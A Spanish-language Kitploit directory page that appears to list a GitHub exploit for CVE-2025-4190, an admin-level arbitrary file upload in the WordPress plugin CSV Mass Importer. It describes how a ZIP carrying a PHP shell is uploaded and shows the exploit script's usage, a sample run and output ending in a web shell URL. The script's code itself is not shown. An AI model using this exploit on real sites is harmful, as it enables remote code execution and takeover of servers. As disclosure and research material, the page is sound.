Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-4190 — CSV Mass Importer <= 1.2 - Carga arbitraria de archivos (Admin+) | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-4190
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-4190

CVE-2025-4190

CSV Mass Importer <= 1.2 - Carga arbitraria de archivos (Admin+)

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-4190 — CSV Mass Importer de WordPress ≤ 1.2 Carga Arbitraria de Archivos

WordPress Plugin
CVE
Status
Author


📌 Descripción

El plugin CSV Mass Importer (≤ 1.2) para WordPress contiene una vulnerabilidad de Carga Arbitraria de Archivos para Admin+.
Debido a una validación incorrecta de los archivos subidos, los usuarios con altos privilegios (como administradores) pueden subir archivos arbitrarios al servidor, incluso cuando esto debería estar restringido — por ejemplo en configuraciones multisitio.

Esta vulnerabilidad permite a un atacante subir shells PHP o archivos maliciosos, lo que conduce a la ejecución remota de código (RCE) en el servidor.

Descubierto por Nxploited (Khaled Alenazi).


🔥 Detalles

  • CSV Mass Importer
Nombre del Plugin:
  • Versión Afectada: ≤ 1.2
  • Tipo de Vulnerabilidad: Carga Arbitraria de Archivos para Admin+
  • CVE: CVE-2025-4190
  • WPVDB ID: e525ece5-6e03-4aee-bf5b-6ae0b961f027
  • Investigador Original: Khaled Alenazi (Nxploited)
  • Sitio Web del Remitente: https://github.com/Nxploited
  • Verificado: ✅

  • 💻 Prueba de Concepto (PoC)

    El plugin no verifica adecuadamente los archivos subidos al utilizar la función de importación CSV.
    Se puede subir un archivo ZIP manipulado que contenga un shell PHP y extraerlo a un directorio de acceso público.

    Ejemplo de Ruta del Shell:

    root@kitploit:~
    <target-url>/wp-content/uploads/cmi-data/nxploited.php
    

    🚀 Uso

    Script

    Este repositorio contiene un script de exploit Python listo: 4190.py

    Menú de Ayuda

    root@kitploit:~
    python CVE-2025-4190.py --help
    usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
    
    WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL
      --username, -un USERNAME
                            WordPress admin username
      --password, -p PASSWORD
                            WordPress admin password
    

    Ejemplo de Ejecución

    root@kitploit:~
    python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    

    Salida Esperada

    root@kitploit:~
    [+] Logged in successfully.
    [+] Payload 'nxploited.zip' created successfully.
    [+] Payload uploaded successfully.
    [+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
    Exploited By Nxploited (Khaled_alenazi)
    

    🕰 Línea de Tiempo

    • Publicado Públicamente: 2025-04-26 (hace unos 11 días)
    • Agregado a la Base de Datos: 2025-05-07 (hace aproximadamente 1 hora)
    • Última Actualización: 2025-05-07 (hace aproximadamente 1 hora)

    🛡 Referencias

    • CVE-2025-4190 en WPScan

    ⚠ Descargo de Responsabilidad

    Este código se proporciona únicamente con fines educativos.
    El autor no se responsabiliza por cualquier uso indebido o daño causado por este script.
    Úsalo de manera responsable y solo en sistemas que estés autorizado a probar.


    Descubierto y desarrollado por Khaled Alenazi (Nxploited) 🌟

    Descargar herramienta